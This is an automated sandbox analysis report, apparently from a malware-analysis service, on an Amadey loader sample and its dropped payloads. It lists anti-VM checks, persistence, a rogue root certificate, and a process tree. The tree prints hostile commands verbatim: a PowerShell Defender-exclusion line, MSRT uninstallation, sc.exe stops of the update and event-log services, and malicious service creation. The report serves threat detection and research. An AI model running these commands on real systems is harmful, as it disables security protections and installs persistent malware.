amadey | 5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplont.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explortu.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3a9ed56e27.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	9e831575c4.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2920	powershell.exe
628	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3a9ed56e27.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	9e831575c4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	9e831575c4.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3a9ed56e27.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplont.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explortu.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explortu.exe

Executes dropped EXE 19 IoCs

pid	Process
2876	explortu.exe
2976	explortu.exe
1652	3a9ed56e27.exe
1504	9e831575c4.exe
2404	axplont.exe
888	buildjudit.exe
2260	stub.exe
2472	33333.exe
2596	fileosn.exe
1188	lumma1234.exe
2084	Newoff.exe
980	toolspub1.exe
1784	gold.exe
1612	FirstZ.exe
3048	swizzzz.exe
2052	Newoff.exe
480	Process not Found
2144	reakuqnanrkn.exe
2416	Newoff.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Wine	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
Key opened	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Wine	explortu.exe
Key opened	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Wine	3a9ed56e27.exe
Key opened	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Wine	9e831575c4.exe
Key opened	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Wine	axplont.exe

Loads dropped DLL 36 IoCs

pid	Process
2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
2876	explortu.exe
2876	explortu.exe
2876	explortu.exe
2876	explortu.exe
1652	3a9ed56e27.exe
2404	axplont.exe
888	buildjudit.exe
2260	stub.exe
2404	axplont.exe
2404	axplont.exe
2644	WerFault.exe
2644	WerFault.exe
2644	WerFault.exe
2404	axplont.exe
2404	axplont.exe
2404	axplont.exe
2264	WerFault.exe
2264	WerFault.exe
2264	WerFault.exe
2404	axplont.exe
2084	Newoff.exe
2084	Newoff.exe
2404	axplont.exe
2404	axplont.exe
1432	WerFault.exe
1432	WerFault.exe
1432	WerFault.exe
2084	Newoff.exe
2084	Newoff.exe
2404	axplont.exe
2404	axplont.exe
2392	WerFault.exe
2392	WerFault.exe
2392	WerFault.exe
480	Process not Found

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\9e831575c4.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\9e831575c4.exe"	explortu.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	pastebin.com
23	pastebin.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	FirstZ.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	reakuqnanrkn.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

pid	Process
2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
2876	explortu.exe
2976	explortu.exe
1652	3a9ed56e27.exe
1504	9e831575c4.exe
2404	axplont.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2876 set thread context of 2976	2876	explortu.exe	29
PID 2144 set thread context of 1580	2144	reakuqnanrkn.exe	112
PID 2144 set thread context of 2772	2144	reakuqnanrkn.exe	114

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\axplont.job	3a9ed56e27.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\Tasks\explortu.job	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2292	sc.exe
2224	sc.exe
2732	sc.exe
1644	sc.exe
2932	sc.exe
1112	sc.exe
2772	sc.exe
1516	sc.exe
1968	sc.exe
3064	sc.exe
1580	sc.exe
1028	sc.exe
1700	sc.exe
2544	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
2644	2472	WerFault.exe	37
2264	1188	WerFault.exe	41
1432	1784	WerFault.exe	48
2392	3048	WerFault.exe	52

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2416	schtasks.exe

Modifies data under HKEY_USERS 6 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00279dd7c1b1da01	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CRLs	explorer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\ROOT\CTLs	explorer.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	fileosn.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	fileosn.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
2876	explortu.exe
2976	explortu.exe
1652	3a9ed56e27.exe
1504	9e831575c4.exe
2404	axplont.exe
1612	FirstZ.exe
2920	powershell.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
1612	FirstZ.exe
2144	reakuqnanrkn.exe
628	powershell.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2144	reakuqnanrkn.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe
2772	explorer.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeShutdownPrivilege	2204	powercfg.exe
Token: SeShutdownPrivilege	2280	powercfg.exe
Token: SeShutdownPrivilege	2476	powercfg.exe
Token: SeShutdownPrivilege	3008	powercfg.exe
Token: SeDebugPrivilege	628	powershell.exe
Token: SeShutdownPrivilege	1284	powercfg.exe
Token: SeShutdownPrivilege	2460	powercfg.exe
Token: SeShutdownPrivilege	2444	powercfg.exe
Token: SeShutdownPrivilege	1608	powercfg.exe
Token: SeLockMemoryPrivilege	2772	explorer.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
1652	3a9ed56e27.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 2876	2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe	28
PID 2164 wrote to memory of 2876	2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe	28
PID 2164 wrote to memory of 2876	2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe	28
PID 2164 wrote to memory of 2876	2164	5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe	28
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 2976	2876	explortu.exe	29
PID 2876 wrote to memory of 1652	2876	explortu.exe	31
PID 2876 wrote to memory of 1652	2876	explortu.exe	31
PID 2876 wrote to memory of 1652	2876	explortu.exe	31
PID 2876 wrote to memory of 1652	2876	explortu.exe	31
PID 2876 wrote to memory of 1504	2876	explortu.exe	32
PID 2876 wrote to memory of 1504	2876	explortu.exe	32
PID 2876 wrote to memory of 1504	2876	explortu.exe	32
PID 2876 wrote to memory of 1504	2876	explortu.exe	32
PID 1652 wrote to memory of 2404	1652	3a9ed56e27.exe	33
PID 1652 wrote to memory of 2404	1652	3a9ed56e27.exe	33
PID 1652 wrote to memory of 2404	1652	3a9ed56e27.exe	33
PID 1652 wrote to memory of 2404	1652	3a9ed56e27.exe	33
PID 2404 wrote to memory of 888	2404	axplont.exe	35
PID 2404 wrote to memory of 888	2404	axplont.exe	35
PID 2404 wrote to memory of 888	2404	axplont.exe	35
PID 2404 wrote to memory of 888	2404	axplont.exe	35
PID 888 wrote to memory of 2260	888	buildjudit.exe	36
PID 888 wrote to memory of 2260	888	buildjudit.exe	36
PID 888 wrote to memory of 2260	888	buildjudit.exe	36
PID 2404 wrote to memory of 2472	2404	axplont.exe	37
PID 2404 wrote to memory of 2472	2404	axplont.exe	37
PID 2404 wrote to memory of 2472	2404	axplont.exe	37
PID 2404 wrote to memory of 2472	2404	axplont.exe	37
PID 2472 wrote to memory of 2644	2472	33333.exe	38
PID 2472 wrote to memory of 2644	2472	33333.exe	38
PID 2472 wrote to memory of 2644	2472	33333.exe	38
PID 2472 wrote to memory of 2644	2472	33333.exe	38
PID 2404 wrote to memory of 2596	2404	axplont.exe	39
PID 2404 wrote to memory of 2596	2404	axplont.exe	39
PID 2404 wrote to memory of 2596	2404	axplont.exe	39
PID 2404 wrote to memory of 2596	2404	axplont.exe	39
PID 2404 wrote to memory of 1188	2404	axplont.exe	41
PID 2404 wrote to memory of 1188	2404	axplont.exe	41
PID 2404 wrote to memory of 1188	2404	axplont.exe	41
PID 2404 wrote to memory of 1188	2404	axplont.exe	41
PID 1188 wrote to memory of 2264	1188	lumma1234.exe	43
PID 1188 wrote to memory of 2264	1188	lumma1234.exe	43
PID 1188 wrote to memory of 2264	1188	lumma1234.exe	43
PID 1188 wrote to memory of 2264	1188	lumma1234.exe	43
PID 2404 wrote to memory of 2084	2404	axplont.exe	44
PID 2404 wrote to memory of 2084	2404	axplont.exe	44
PID 2404 wrote to memory of 2084	2404	axplont.exe	44
PID 2404 wrote to memory of 2084	2404	axplont.exe	44
PID 2084 wrote to memory of 2416	2084	Newoff.exe	45
PID 2084 wrote to memory of 2416	2084	Newoff.exe	45
PID 2084 wrote to memory of 2416	2084	Newoff.exe	45
PID 2084 wrote to memory of 2416	2084	Newoff.exe	45

C:\Users\Admin\AppData\Local\Temp\5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe
"C:\Users\Admin\AppData\Local\Temp\5326e0e7a15ab2e5392db6c221d9003146f13b0ff6aad6c2ef3725fdc8b44a09.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2164
- C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2876
- - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:2976
- - C:\Users\Admin\1000004002\3a9ed56e27.exe
    "C:\Users\Admin\1000004002\3a9ed56e27.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
      "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:2404
    - - C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:888
      - C:\Users\Admin\AppData\Local\Temp\onefile_888_133614584659300000\stub.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000002001\buildjudit.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2260
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2472
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 72
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2644
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        
        PID:2596
    - - C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1188
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1188 -s 68
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2264
    - - C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:2084
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe" /F
        6⤵
        Creates scheduled task(s)
        
        PID:2416
      - C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000284001\toolspub1.exe"
        6⤵
        Executes dropped EXE
        
        PID:980
      - C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000285001\FirstZ.exe"
        6⤵
        Executes dropped EXE
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1612
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        7⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1708
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        Drops file in Windows directory
        
        PID:1436
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:1580
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:2732
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:2772
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        7⤵
        Launches sc.exe
        
        PID:1644
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        7⤵
        Launches sc.exe
        
        PID:1028
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2280
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2204
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3008
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2476
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "WSNKISKT"
        7⤵
        Launches sc.exe
        
        PID:1700
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
        7⤵
        Launches sc.exe
        
        PID:2932
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        7⤵
        Launches sc.exe
        
        PID:1516
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "WSNKISKT"
        7⤵
        Launches sc.exe
        
        PID:2544
    - - C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
        5⤵
        Executes dropped EXE
        
        PID:1784
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 72
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:1432
    - - C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
        5⤵
        Executes dropped EXE
        
        PID:3048
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 96
        6⤵
        Loads dropped DLL
        Program crash
        
        PID:2392
- - C:\Users\Admin\AppData\Local\Temp\1000005001\9e831575c4.exe
    "C:\Users\Admin\AppData\Local\Temp\1000005001\9e831575c4.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    PID:1504

C:\Windows\system32\taskeng.exe
taskeng.exe {1962AE41-8BF0-4957-88FC-F3ADF4FC65C6} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
1⤵
PID:1764
- C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
  C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
  2⤵
  - Executes dropped EXE
  PID:2052
- C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
  C:\Users\Admin\AppData\Local\Temp\1000007001\Newoff.exe
  2⤵
  - Executes dropped EXE
  PID:2416

C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2144
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2200
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:1364
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:1112
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:1968
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2292
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:2224
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3064
- C:\Windows\system32\powercfg.exe
